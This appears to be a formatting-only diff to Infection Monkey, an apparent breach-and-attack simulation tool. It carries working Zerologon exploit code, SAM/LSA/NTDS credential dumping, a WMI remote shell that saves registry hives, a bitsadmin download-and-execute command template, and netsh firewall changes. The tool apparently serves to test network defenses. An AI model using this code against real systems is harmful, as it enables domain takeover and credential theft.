+ security=os.path.join(os.path.expanduser("~"), "monkey-security.save"),
)
dumped_secrets = self.get_dumped_secrets(remote_name="LOCAL", options=options)
@@ -310,7 +315,8 @@ class ZerologonExploiter(HostExploiter):
except Exception as e:
LOG.info(
- f"Exception occurred while dumping secrets to get original DC password's NT hash: {str(e)}"
+ f"Exception occurred while dumping secrets to get original DC password's NT "
+ f"hash: {str(e)}"
)
finally:
@@ -318,14 +324,15 @@ class ZerologonExploiter(HostExploiter):
def save_HKLM_keys_locally(self, username: str, user_pwd_hashes: List[str]) -> bool:
LOG.info(
- f"Starting remote shell on victim with credentials:\n"
- f"user: {username}\n"
- f"hashes (SHA-512): {self._config.hash_sensitive_data(user_pwd_hashes[0])} : "
- f"{self._config.hash_sensitive_data(user_pwd_hashes[1])}"
+ f"Starting remote shell on victim with credentials:\n"
+ f"user: {username}\n"
+ f"hashes (SHA-512): {self._config.hash_sensitive_data(user_pwd_hashes[0])} : "
+ f"{self._config.hash_sensitive_data(user_pwd_hashes[1])}"
)
wmiexec = Wmiexec(
- ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes), domain=self.dc_ip
+ ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes),
+ domain=self.dc_ip
)
remote_shell = wmiexec.get_remote_shell()
@@ -334,12 +341,13 @@ class ZerologonExploiter(HostExploiter):
try:
# Save HKLM keys on victim.
remote_shell.onecmd(
- "reg save HKLM\\SYSTEM system.save && "
- + "reg save HKLM\\SAM sam.save && "
- + "reg save HKLM\\SECURITY security.save"
+ "reg save HKLM\\SYSTEM system.save && "
+ + "reg save HKLM\\SAM sam.save && "
+ + "reg save HKLM\\SECURITY security.save"
)
- # Get HKLM keys locally (can't run these together because it needs to call do_get()).
+ # Get HKLM keys locally (can't run these together because it needs to call
+ # do_get()).
remote_shell.onecmd("get system.save")
remote_shell.onecmd("get sam.save")
remote_shell.onecmd("get security.save")
@@ -382,7 +390,7 @@ class ZerologonExploiter(HostExploiter):
return False
def try_restoration_attempt(
- self, rpc_con: rpcrt.DCERPC_v5, original_pwd_nthash: str
+ self, rpc_con: rpcrt.DCERPC_v5, original_pwd_nthash: str
) -> Optional[object]:
try:
restoration_attempt_result = self.attempt_restoration(rpc_con, original_pwd_nthash)
@@ -398,7 +406,7 @@ class ZerologonExploiter(HostExploiter):
return False
def attempt_restoration(
- self, rpc_con: rpcrt.DCERPC_v5, original_pwd_nthash: str
+ self, rpc_con: rpcrt.DCERPC_v5, original_pwd_nthash: str
) -> Optional[object]:
plaintext = b"\x00" * 8
ciphertext = b"\x00" * 8
@@ -406,26 +414,26 @@ class ZerologonExploiter(HostExploiter):
# Send challenge and authentication request.
server_challenge_response = nrpc.hNetrServerReqChallenge(
- rpc_con, self.dc_handle + "\x00", self.dc_name + "\x00", plaintext
+ rpc_con, self.dc_handle + "\x00", self.dc_name + "\x00", plaintext
)
server_challenge = server_challenge_response["ServerChallenge"]
server_auth = nrpc.hNetrServerAuthenticate3(
- rpc_con,
- self.dc_handle + "\x00",
- self.dc_name + "$\x00",
- nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
- self.dc_name + "\x00",
- ciphertext,
- flags,
+ rpc_con,
+ self.dc_handle + "\x00",
+ self.dc_name + "$\x00",
+ nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
+ self.dc_name + "\x00",
+ ciphertext,
+ flags,
)
assert server_auth["ErrorCode"] == 0
session_key = nrpc.ComputeSessionKeyAES(
- None,
- b"\x00" * 8,
- server_challenge,
- unhexlify("31d6cfe0d16ae931b73c59d7e0c089c0"),
+ None,
+ b"\x00" * 8,
+ server_challenge,
+ unhexlify("31d6cfe0d16ae931b73c59d7e0c089c0"),
)
try:
@@ -436,7 +444,7 @@ class ZerologonExploiter(HostExploiter):
ZerologonExploiter._set_up_request(request, self.dc_name)
request["PrimaryName"] = NULL
pwd_data = impacket.crypto.SamEncryptNTLMHash(
- unhexlify(original_pwd_nthash), session_key
+ unhexlify(original_pwd_nthash), session_key
)
request["UasNewPassword"] = pwd_data
diff --git a/monkey/infection_monkey/exploit/zerologon_utils/dump_secrets.py b/monkey/infection_monkey/exploit/zerologon_utils/dump_secrets.py
index 9d2116d07..6601a5ea4 100644
--- a/monkey/infection_monkey/exploit/zerologon_utils/dump_secrets.py
+++ b/monkey/infection_monkey/exploit/zerologon_utils/dump_secrets.py
@@ -98,11 +98,11 @@ class DumpSecrets:
def connect(self):
self.__smb_connection = SMBConnection(self.__remote_name, self.__remote_host)
self.__smb_connection.login(
- self.__username,
- self.__password,
- self.__domain,
- self.__lmhash,
- self.__nthash,
+ self.__username,
+ self.__password,
+ self.__domain,
+ self.__lmhash,
+ self.__nthash,
)
def dump(self): # noqa: C901
@@ -132,24 +132,26 @@ class DumpSecrets:
self.connect()
except Exception as e:
if os.getenv("KRB5CCNAME") is not None and self.__do_kerberos is True:
- # SMBConnection failed. That might be because there was no way to log into the
- # target system. We just have a last resort. Hope we have tickets cached and that they
+ # SMBConnection failed. That might be because there was no way to
+ # log into the
+ # target system. We just have a last resort. Hope we have tickets
+ # cached and that they
# will work
LOG.debug(
- "SMBConnection didn't work, hoping Kerberos will help (%s)"
- % str(e)
+ "SMBConnection didn't work, hoping Kerberos will help (%s)"
+ % str(e)
)
else:
raise
self.__remote_ops = RemoteOperations(
- self.__smb_connection, self.__do_kerberos, self.__kdc_host
+ self.__smb_connection, self.__do_kerberos, self.__kdc_host
)
self.__remote_ops.setExecMethod(self.__options.exec_method)
if (
- self.__just_DC is False
- and self.__just_DC_NTLM is False
- or self.__use_VSS_method is True
+ self.__just_DC is False
+ and self.__just_DC_NTLM is False
+ or self.__use_VSS_method is True
):
self.__remote_ops.enableRegistry()
bootkey = self.__remote_ops.getBootKey()
@@ -158,24 +160,26 @@ class DumpSecrets:
except Exception as e:
self.__can_process_SAM_LSA = False
if (
- str(e).find("STATUS_USER_SESSION_DELETED")
- and os.getenv("KRB5CCNAME") is not None
- and self.__do_kerberos is True
+ str(e).find("STATUS_USER_SESSION_DELETED")
+ and os.getenv("KRB5CCNAME") is not None
+ and self.__do_kerberos is True
):
- # Giving some hints here when SPN target name validation is set to something different to Off.
- # This will prevent establishing SMB connections using TGS for SPNs different to cifs/.
+ # Giving some hints here when SPN target name validation is set to
+ # something different to Off.
+ # This will prevent establishing SMB connections using TGS for SPNs
+ # different to cifs/.
LOG.error(
- "Policy SPN target name validation might be restricting full DRSUAPI dump."
- + "Try -just-dc-user"
+ "Policy SPN target name validation might be restricting full "
+ "DRSUAPI dump." + "Try -just-dc-user"
)
else:
LOG.error("RemoteOperations failed: %s" % str(e))
# If RemoteOperations succeeded, then we can extract SAM and LSA.
if (
- self.__just_DC is False
- and self.__just_DC_NTLM is False
- and self.__can_process_SAM_LSA
+ self.__just_DC is False
+ and self.__just_DC_NTLM is False
+ and self.__can_process_SAM_LSA
):
try:
if self.__is_remote is True:
@@ -184,7 +188,7 @@ class DumpSecrets:
SAM_file_name = self.__sam_hive
self.__SAM_hashes = SAMHashes(
- SAM_file_name, bootkey, isRemote=self.__is_remote
+ SAM_file_name, bootkey, isRemote=self.__is_remote
)
self.__SAM_hashes.dump()
except Exception as e:
@@ -197,10 +201,10 @@ class DumpSecrets:
SECURITY_file_name = self.__security_hive
self.__LSA_secrets = LSASecrets(
- SECURITY_file_name,
- bootkey,
- self.__remote_ops,
- isRemote=self.__is_remote,
+ SECURITY_file_name,
+ bootkey,
+ self.__remote_ops,
+ isRemote=self.__is_remote,
)
self.__LSA_secrets.dumpCachedHashes()
self.__LSA_secrets.dumpSecrets()
@@ -208,7 +212,8 @@ class DumpSecrets:
LOG.debug(traceback.print_exc())
LOG.error("LSA hashes extraction failed: %s" % str(e))
- # NTDS Extraction we can try regardless of RemoteOperations failing. It might still work.
+ # NTDS Extraction we can try regardless of RemoteOperations failing. It might
+ # still work.
if self.__is_remote is True:
if self.__use_VSS_method and self.__remote_ops is not None:
NTDS_file_name = self.__remote_ops.saveNTDS()
@@ -218,20 +223,21 @@ class DumpSecrets:
NTDS_file_name = self.__ntds_file
self.__NTDS_hashes = NTDSHashes(
- NTDS_file_name,
- bootkey,
- isRemote=self.__is_remote,
- noLMHash=self.__no_lmhash,
- remoteOps=self.__remote_ops,
- useVSSMethod=self.__use_VSS_method,
- justNTLM=self.__just_DC_NTLM,
+ NTDS_file_name,
+ bootkey,
+ isRemote=self.__is_remote,
+ noLMHash=self.__no_lmhash,
+ remoteOps=self.__remote_ops,
+ useVSSMethod=self.__use_VSS_method,
+ justNTLM=self.__just_DC_NTLM,
)
try:
self.__NTDS_hashes.dump()
except Exception as e:
LOG.debug(traceback.print_exc())
if str(e).find("ERROR_DS_DRA_BAD_DN") >= 0:
- # We don't store the resume file if this error happened, since this error is related to lack
+ # We don't store the resume file if this error happened, since this error
+ # is related to lack
# of enough privileges to access DRSUAPI.
resume_file = self.__NTDS_hashes.getResumeSessionFile()
if resume_file is not None:
@@ -239,7 +245,8 @@ class DumpSecrets:
LOG.error(e)
if self.__use_VSS_method is False:
LOG.error(
- "Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter"
+ "Something wen't wrong with the DRSUAPI approach. Try again with "
+ "-use-vss parameter"
)
self.cleanup()
except (Exception, KeyboardInterrupt) as e:
diff --git a/monkey/infection_monkey/exploit/zerologon_utils/options.py b/monkey/infection_monkey/exploit/zerologon_utils/options.py
index 32cdfe40f..0c888a459 100644
--- a/monkey/infection_monkey/exploit/zerologon_utils/options.py
+++ b/monkey/infection_monkey/exploit/zerologon_utils/options.py
@@ -26,18 +26,20 @@ class OptionsForSecretsdump:
use_vss = False
def __init__(
- self,
- dc_ip=None,
- just_dc=True,
- sam=None,
- security=None,
- system=None,
- target=None,
- target_ip=None,
+ self,
+ dc_ip=None,
+ just_dc=True,
+ sam=None,
+ security=None,
+ system=None,
+ target=None,
+ target_ip=None,
):
- # dc_ip is assigned in get_original_pwd_nthash() and get_admin_pwd_hashes() in ../zerologon.py
+ # dc_ip is assigned in get_original_pwd_nthash() and get_admin_pwd_hashes() in
+ # ../zerologon.py
self.dc_ip = dc_ip
- # just_dc becomes False, and sam, security, and system are assigned in get_original_pwd_nthash() in ../zerologon.py
+ # just_dc becomes False, and sam, security, and system are assigned in
+ # get_original_pwd_nthash() in ../zerologon.py
self.just_dc = just_dc
self.sam = sam
self.security = security
diff --git a/monkey/infection_monkey/exploit/zerologon_utils/remote_shell.py b/monkey/infection_monkey/exploit/zerologon_utils/remote_shell.py
index 3b635f6b5..91511226f 100644
--- a/monkey/infection_monkey/exploit/zerologon_utils/remote_shell.py
+++ b/monkey/infection_monkey/exploit/zerologon_utils/remote_shell.py
@@ -134,9 +134,11 @@ class RemoteShell(cmd.Cmd):
self.__outputBuffer += data.decode(self.CODEC)
except UnicodeDecodeError:
LOG.error(
- "Decoding error detected, consider running chcp.com at the target,\nmap the result with "
- "https://docs.python.org/3/library/codecs.html#standard-encodings\nand then execute wmiexec.py "
- "again with -codec and the corresponding codec"
+ "Decoding error detected, consider running chcp.com at the target,"
+ "\nmap the result with "
+ "https://docs.python.org/3/library/codecs.html#standard-encodings\nand "
+ "then execute wmiexec.py "
+ "again with -codec and the corresponding codec"
)
self.__outputBuffer += data.decode(self.CODEC, errors="replace")
diff --git a/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py b/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py
index 467c41d69..0f345aa80 100644
--- a/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py
+++ b/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py
@@ -23,14 +23,14 @@ def _get_dc_name(dc_ip: str) -> str:
"""
nb = nmb.NetBIOS.NetBIOS()
name = nb.queryIPForName(
- ip=dc_ip, timeout=MEDIUM_REQUEST_TIMEOUT
+ ip=dc_ip, timeout=MEDIUM_REQUEST_TIMEOUT
) # returns either a list of NetBIOS names or None
if name:
return name[0]
else:
raise DomainControllerNameFetchError(
- "Couldn't get domain controller's name, maybe it's on external network?"
+ "Couldn't get domain controller's name, maybe it's on external network?"
)
@@ -62,21 +62,21 @@ def _try_zero_authenticate(zerologon_exploiter_object, rpc_con: rpcrt.DCERPC_v5)
# Send challenge and authentication request.
nrpc.hNetrServerReqChallenge(
- rpc_con,
- zerologon_exploiter_object.dc_handle + "\x00",
- zerologon_exploiter_object.dc_name + "\x00",
- plaintext,
+ rpc_con,
+ zerologon_exploiter_object.dc_handle + "\x00",
+ zerologon_exploiter_object.dc_name + "\x00",
+ plaintext,
)
try:
server_auth = nrpc.hNetrServerAuthenticate3(
- rpc_con,
- zerologon_exploiter_object.dc_handle + "\x00",
- zerologon_exploiter_object.dc_name + "$\x00",
- nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
- zerologon_exploiter_object.dc_name + "\x00",
- ciphertext,
- flags,
+ rpc_con,
+ zerologon_exploiter_object.dc_handle + "\x00",
+ zerologon_exploiter_object.dc_name + "$\x00",
+ nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
+ zerologon_exploiter_object.dc_name + "\x00",
+ ciphertext,
+ flags,
)
assert server_auth["ErrorCode"] == 0
@@ -84,7 +84,7 @@ def _try_zero_authenticate(zerologon_exploiter_object, rpc_con: rpcrt.DCERPC_v5)
except nrpc.DCERPCSessionError as ex:
if (
- ex.get_error_code() == 0xC0000022
+ ex.get_error_code() == 0xC0000022
): # STATUS_ACCESS_DENIED error; if not this, probably some other issue.
pass
else:
diff --git a/monkey/infection_monkey/exploit/zerologon_utils/wmiexec.py b/monkey/infection_monkey/exploit/zerologon_utils/wmiexec.py
index 2486998e4..615994b1f 100644
--- a/monkey/infection_monkey/exploit/zerologon_utils/wmiexec.py
+++ b/monkey/infection_monkey/exploit/zerologon_utils/wmiexec.py
@@ -73,26 +73,26 @@ class Wmiexec:
def connect(self):
self.smbConnection = SMBConnection(self.__ip, self.__ip)
self.smbConnection.login(
- user=self.__username,
- password=self.__password,
- domain=self.__domain,
- lmhash=self.__lmhash,
- nthash=self.__nthash,
+ user=self.__username,
+ password=self.__password,
+ domain=self.__domain,
+ lmhash=self.__lmhash,
+ nthash=self.__nthash,
)
self.dcom = DCOMConnection(
- target=self.__ip,
- username=self.__username,
- password=self.__password,
- domain=self.__domain,
- lmhash=self.__lmhash,
- nthash=self.__nthash,
- oxidResolver=True,
+ target=self.__ip,
+ username=self.__username,
+ password=self.__password,
+ domain=self.__domain,
+ lmhash=self.__lmhash,
+ nthash=self.__nthash,
+ oxidResolver=True,
)
try:
iInterface = self.dcom.CoCreateInstanceEx(
- wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login
+ wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login
)
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
self.iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL)
@@ -107,7 +107,7 @@ class Wmiexec:
self.connect()
win32Process, _ = self.iWbemServices.GetObject("Win32_Process")
self.shell = RemoteShell(
- self.__share, win32Process, self.smbConnection, self.OUTPUT_FILENAME
+ self.__share, win32Process, self.smbConnection, self.OUTPUT_FILENAME
)
return self.shell
diff --git a/monkey/infection_monkey/main.py b/monkey/infection_monkey/main.py
index e0c0eef08..c72f5b242 100644
--- a/monkey/infection_monkey/main.py
+++ b/monkey/infection_monkey/main.py
@@ -22,23 +22,24 @@ __author__ = "itamar"
LOG = None
LOG_CONFIG = {
- "version": 1,
- "disable_existing_loggers": False,
- "formatters": {
- "standard": {
- "format": "%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s"
+ "version":1,
+ "disable_existing_loggers":False,
+ "formatters":{
+ "standard":{
+ "format":"%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%("
+ "funcName)s.%(lineno)d: %(message)s"
},
},
- "handlers": {
- "console": {"class": "logging.StreamHandler", "level": "DEBUG", "formatter": "standard"},
- "file": {
- "class": "logging.FileHandler",
- "level": "DEBUG",
- "formatter": "standard",
- "filename": None,
+ "handlers":{
+ "console":{"class":"logging.StreamHandler", "level":"DEBUG", "formatter":"standard"},
+ "file":{
+ "class":"logging.FileHandler",
+ "level":"DEBUG",
+ "formatter":"standard",
+ "filename":None,
},
},
- "root": {"level": "DEBUG", "handlers": ["console"]},
+ "root":{"level":"DEBUG", "handlers":["console"]},
}
@@ -71,13 +72,13 @@ def main():
print("Error loading config: %s, using default" % (e,))
else:
print(
- "Config file wasn't supplied and default path: %s wasn't found, using internal default"
- % (config_file,)
+ "Config file wasn't supplied and default path: %s wasn't found, using internal "
+ "default" % (config_file,)
)
print(
- "Loaded Configuration: %r"
- % WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict())
+ "Loaded Configuration: %r"
+ % WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict())
)
# Make sure we're not in a machine that has the kill file
@@ -104,7 +105,8 @@ def main():
if WormConfiguration.use_file_logging:
if os.path.exists(log_path):
- # If log exists but can't be removed it means other monkey is running. This usually happens on upgrade
+ # If log exists but can't be removed it means other monkey is running. This usually
+ # happens on upgrade
# from 32bit to 64bit monkey on Windows. In all cases this shouldn't be a problem.
try:
os.remove(log_path)
@@ -126,7 +128,8 @@ def main():
sys.excepthook = log_uncaught_exceptions
LOG.info(
- ">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__, os.getpid()
+ ">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__,
+ os.getpid()
)
LOG.info(f"version: {get_version()}")
@@ -141,12 +144,12 @@ def main():
with open(config_file, "w") as config_fo:
json_dict = WormConfiguration.as_dict()
json.dump(
- json_dict,
- config_fo,
- skipkeys=True,
- sort_keys=True,
- indent=4,
- separators=(",", ": "),
+ json_dict,
+ config_fo,
+ skipkeys=True,
+ sort_keys=True,
+ indent=4,
+ separators=(",", ": "),
)
return True
diff --git a/monkey/infection_monkey/model/__init__.py b/monkey/infection_monkey/model/__init__.py
index 4f6f8de4a..1bfee3ef2 100644
--- a/monkey/infection_monkey/model/__init__.py
+++ b/monkey/infection_monkey/model/__init__.py
@@ -27,12 +27,12 @@ MONKEY_CMDLINE_DETACHED_WINDOWS = "%s start cmd /c %%(monkey_path)s %s" % (
MONKEY_ARG,
)
MONKEY_CMDLINE_HTTP = (
- '%s /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s'
- '&cmd /c %%(monkey_path)s %s"'
- % (
- CMD_PREFIX,
- MONKEY_ARG,
- )
+ '%s /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s'
+ '&cmd /c %%(monkey_path)s %s"'
+ % (
+ CMD_PREFIX,
+ MONKEY_ARG,
+ )
)
DELAY_DELETE_CMD = (
"cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & "
diff --git a/monkey/infection_monkey/monkey.py b/monkey/infection_monkey/monkey.py
index 7123d8b9e..086a163a8 100644
--- a/monkey/infection_monkey/monkey.py
+++ b/monkey/infection_monkey/monkey.py
@@ -100,7 +100,8 @@ class InfectionMonkey(object):
WormConfiguration.command_servers.insert(0, self._default_server)
else:
LOG.debug(
- "Default server: %s is already in command servers list" % self._default_server
+ "Default server: %s is already in command servers list" %
+ self._default_server
)
def start(self):
@@ -161,8 +162,8 @@ class InfectionMonkey(object):
break
machines = self._network.get_victim_machines(
- max_find=WormConfiguration.victims_max_find,
- stop_callback=ControlClient.check_for_stop,
+ max_find=WormConfiguration.victims_max_find,
+ stop_callback=ControlClient.check_for_stop,
)
is_empty = True
for machine in machines:
@@ -172,17 +173,17 @@ class InfectionMonkey(object):
is_empty = False
for finger in self._fingerprint:
LOG.info(
- "Trying to get OS fingerprint from %r with module %s",
- machine,
- finger.__class__.__name__,
+ "Trying to get OS fingerprint from %r with module %s",
+ machine,
+ finger.__class__.__name__,
)
try:
finger.get_host_fingerprint(machine)
except BaseException as exc:
LOG.error(
- "Failed to run fingerprinter %s, exception %s"
- % finger.__class__.__name__,
- str(exc),
+ "Failed to run fingerprinter %s, exception %s"
+ % finger.__class__.__name__,
+ str(exc),
)
ScanTelem(machine).send()
@@ -203,23 +204,23 @@ class InfectionMonkey(object):
if self._default_server:
if self._network.on_island(self._default_server):
machine.set_default_server(
- get_interface_to_target(machine.ip_addr)
- + (
- ":" + self._default_server_port
- if self._default_server_port
- else ""
- )
+ get_interface_to_target(machine.ip_addr)
+ + (
+ ":" + self._default_server_port
+ if self._default_server_port
+ else ""
+ )
)
else:
machine.set_default_server(self._default_server)
LOG.debug(
- "Default server for machine: %r set to %s"
- % (machine, machine.default_server)
+ "Default server for machine: %r set to %s"
+ % (machine, machine.default_server)
)
# Order exploits according to their type
self._exploiters = sorted(
- self._exploiters, key=lambda exploiter_: exploiter_.EXPLOIT_TYPE.value
+ self._exploiters, key=lambda exploiter_:exploiter_.EXPLOIT_TYPE.value
)
host_exploited = False
for exploiter in [exploiter(machine) for exploiter in self._exploiters]:
@@ -227,7 +228,8 @@ class InfectionMonkey(object):
host_exploited = True
VictimHostTelem("T1210", ScanStatus.USED, machine=machine).send()
if exploiter.RUNS_AGENT_ON_SUCCESS:
- break # if adding machine to exploited, won't try other exploits on it
+ break # if adding machine to exploited, won't try other exploits
+ # on it
if not host_exploited:
self._fail_exploitation_machines.add(machine)
VictimHostTelem("T1210", ScanStatus.SCANNED, machine=machine).send()
@@ -244,12 +246,14 @@ class InfectionMonkey(object):
elif not WormConfiguration.alive:
LOG.info("Marked not alive from configuration")
- # if host was exploited, before continue to closing the tunnel ensure the exploited host had its chance to
+ # if host was exploited, before continue to closing the tunnel ensure the exploited
+ # host had its chance to
# connect to the tunnel
if len(self._exploited_machines) > 0:
time_to_sleep = WormConfiguration.keep_tunnel_open_time
LOG.info(
- "Sleeping %d seconds for exploited machines to connect to tunnel", time_to_sleep
+ "Sleeping %d seconds for exploited machines to connect to tunnel",
+ time_to_sleep
)
time.sleep(time_to_sleep)
@@ -261,7 +265,8 @@ class InfectionMonkey(object):
except PlannedShutdownException:
LOG.info(
- "A planned shutdown of the Monkey occurred. Logging the reason and finishing execution."
+ "A planned shutdown of the Monkey occurred. Logging the reason and finishing "
+ "execution."
)
LOG.exception("Planned shutdown, reason:")
@@ -306,7 +311,7 @@ class InfectionMonkey(object):
firewall.close()
else:
StateTelem(
- is_done=True, version=get_version()
+ is_done=True, version=get_version()
).send() # Signal the server (before closing the tunnel)
InfectionMonkey.close_tunnel()
firewall.close()
@@ -341,12 +346,12 @@ class InfectionMonkey(object):
startupinfo.dwFlags = CREATE_NEW_CONSOLE | STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_HIDE
subprocess.Popen(
- DELAY_DELETE_CMD % {"file_path": sys.executable},
- stdin=None,
- stdout=None,
- stderr=None,
- close_fds=True,
- startupinfo=startupinfo,
+ DELAY_DELETE_CMD % {"file_path":sys.executable},
+ stdin=None,
+ stdout=None,
+ stderr=None,
+ close_fds=True,
+ startupinfo=startupinfo,
)
else:
os.remove(sys.executable)
@@ -376,10 +381,10 @@ class InfectionMonkey(object):
"""
if not exploiter.is_os_supported():
LOG.info(
- "Skipping exploiter %s host:%r, os %s is not supported",
- exploiter.__class__.__name__,
- machine,
- machine.os,
+ "Skipping exploiter %s host:%r, os %s is not supported",
+ exploiter.__class__.__name__,
+ machine,
+ machine.os,
)
return False
@@ -393,30 +398,31 @@ class InfectionMonkey(object):
return True
else:
LOG.info(
- "Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__
+ "Failed exploiting %r with exploiter %s", machine,
+ exploiter.__class__.__name__
)
except ExploitingVulnerableMachineError as exc:
LOG.error(
- "Exception while attacking %s using %s: %s",
- machine,
- exploiter.__class__.__name__,
- exc,
+ "Exception while attacking %s using %s: %s",
+ machine,
+ exploiter.__class__.__name__,
+ exc,
)
self.successfully_exploited(machine, exploiter, exploiter.RUNS_AGENT_ON_SUCCESS)
return True
except FailedExploitationError as e:
LOG.info(
- "Failed exploiting %r with exploiter %s, %s",
- machine,
- exploiter.__class__.__name__,
- e,
+ "Failed exploiting %r with exploiter %s, %s",
+ machine,
+ exploiter.__class__.__name__,
+ e,
)
except Exception as exc:
LOG.exception(
- "Exception while attacking %s using %s: %s",
- machine,
- exploiter.__class__.__name__,
- exc,
+ "Exception while attacking %s using %s: %s",
+ machine,
+ exploiter.__class__.__name__,
+ exc,
)
finally:
exploiter.send_exploit_telemetry(result)
@@ -452,7 +458,8 @@ class InfectionMonkey(object):
"""
if not ControlClient.find_server(default_tunnel=self._default_tunnel):
raise PlannedShutdownException(
- "Monkey couldn't find server with {} default tunnel.".format(self._default_tunnel)
+ "Monkey couldn't find server with {} default tunnel.".format(
+ self._default_tunnel)
)
self._default_server = WormConfiguration.current_server
LOG.debug("default server set to: %s" % self._default_server)
diff --git a/monkey/infection_monkey/network/firewall.py b/monkey/infection_monkey/network/firewall.py
index cddba49fe..6b23734bb 100644
--- a/monkey/infection_monkey/network/firewall.py
+++ b/monkey/infection_monkey/network/firewall.py
@@ -5,12 +5,12 @@ import sys
def _run_netsh_cmd(command, args):
cmd = subprocess.Popen(
- "netsh %s %s"
- % (
- command,
- " ".join(['%s="%s"' % (key, value) for key, value in list(args.items()) if value]),
- ),
- stdout=subprocess.PIPE,
+ "netsh %s %s"
+ % (
+ command,
+ " ".join(['%s="%s"' % (key, value) for key, value in list(args.items()) if value]),
+ ),
+ stdout=subprocess.PIPE,
)
return cmd.stdout.read().strip().lower().endswith("ok.")
@@ -56,9 +56,9 @@ class WinAdvFirewall(FirewallApp):
return None
def add_firewall_rule(
- self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs
+ self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs
):
- netsh_args = {"name": name, "dir": direction, "action": action, "program": program}
+ netsh_args = {"name":name, "dir":direction, "action":action, "program":program}
netsh_args.update(kwargs)
try:
if _run_netsh_cmd("advfirewall firewall add rule", netsh_args):
@@ -70,7 +70,7 @@ class WinAdvFirewall(FirewallApp):
return None
def remove_firewall_rule(self, name="Firewall", **kwargs):
- netsh_args = {"name": name}
+ netsh_args = {"name":name}
netsh_args.update(kwargs)
try:
@@ -89,10 +89,10 @@ class WinAdvFirewall(FirewallApp):
for rule in list(self._rules.values()):
if (
- rule.get("program") == sys.executable
- and "in" == rule.get("dir")
- and "allow" == rule.get("action")
- and 4 == len(list(rule.keys()))
+ rule.get("program") == sys.executable
+ and "in" == rule.get("dir")
+ and "allow" == rule.get("action")
+ and 4 == len(list(rule.keys()))
):
return True
return False
@@ -125,14 +125,14 @@ class WinFirewall(FirewallApp):
return None
def add_firewall_rule(
- self,
- rule="allowedprogram",
- name="Firewall",
- mode="ENABLE",
- program=sys.executable,
- **kwargs,
+ self,
+ rule="allowedprogram",
+ name="Firewall",
+ mode="ENABLE",
+ program=sys.executable,
+ **kwargs,
):
- netsh_args = {"name": name, "mode": mode, "program": program}
+ netsh_args = {"name":name, "mode":mode, "program":program}
netsh_args.update(kwargs)
try:
@@ -146,14 +146,14 @@ class WinFirewall(FirewallApp):
return None
def remove_firewall_rule(
- self,
- rule="allowedprogram",
- name="Firewall",
- mode="ENABLE",
- program=sys.executable,
- **kwargs,
+ self,
+ rule="allowedprogram",
+ name="Firewall",
+ mode="ENABLE",
+ program=sys.executable,
+ **kwargs,
):
- netsh_args = {"program": program}
+ netsh_args = {"program":program}
netsh_args.update(kwargs)
try:
if _run_netsh_cmd("firewall delete %s" % rule, netsh_args):
diff --git a/monkey/infection_monkey/network/info.py b/monkey/infection_monkey/network/info.py
index 21adae9f8..a0db9ab02 100644
--- a/monkey/infection_monkey/network/info.py
+++ b/monkey/infection_monkey/network/info.py
@@ -52,6 +52,7 @@ if is_windows_os():
local_hostname = socket.gethostname()
return socket.gethostbyname_ex(local_hostname)[2]
+
def get_routes():
raise NotImplementedError()
@@ -59,10 +60,12 @@ if is_windows_os():
else:
from fcntl import ioctl
+
def local_ips():
valid_ips = [network["addr"] for network in get_host_subnets()]
return valid_ips
+
def get_routes(): # based on scapy implementation for route parsing
try:
f = open("/proc/net/route", "r")
@@ -88,7 +91,8 @@ else:
continue
try:
ifreq = ioctl(s, SIOCGIFADDR, struct.pack("16s16x", iff))
- except IOError: # interface is present in routing tables but does not have any assigned IP
+ except IOError: # interface is present in routing tables but does not have any
+ # assigned IP
ifaddr = "0.0.0.0"
else:
addrfamily = struct.unpack("h", ifreq[16:18])[0]
@@ -97,13 +101,13 @@ else:
else:
continue
routes.append(
- (
- socket.htonl(int(dst, 16)) & 0xFFFFFFFF,
- socket.htonl(int(msk, 16)) & 0xFFFFFFFF,
- socket.inet_ntoa(struct.pack("I", int(gw, 16))),
- iff,
- ifaddr,
- )
+ (
+ socket.htonl(int(dst, 16)) & 0xFFFFFFFF,
+ socket.htonl(int(msk, 16)) & 0xFFFFFFFF,
+ socket.inet_ntoa(struct.pack("I", int(gw, 16))),
+ iff,
+ ifaddr,
+ )
)
f.close()
diff --git a/monkey/infection_monkey/network/mssql_fingerprint.py b/monkey/infection_monkey/network/mssql_fingerprint.py
index 3113d278f..9ecdcbb5c 100644
--- a/monkey/infection_monkey/network/mssql_fingerprint.py
+++ b/monkey/infection_monkey/network/mssql_fingerprint.py
@@ -49,29 +49,28 @@ class MSSQLFinger(HostFinger):
data, server = sock.recvfrom(self.BUFFER_SIZE)
except socket.timeout:
LOG.info(
- "Socket timeout reached, maybe browser service on host: {0} doesnt exist".format(
- host
- )
+ "Socket timeout reached, maybe browser service on host: {0} doesnt "
+ "exist".format(host)
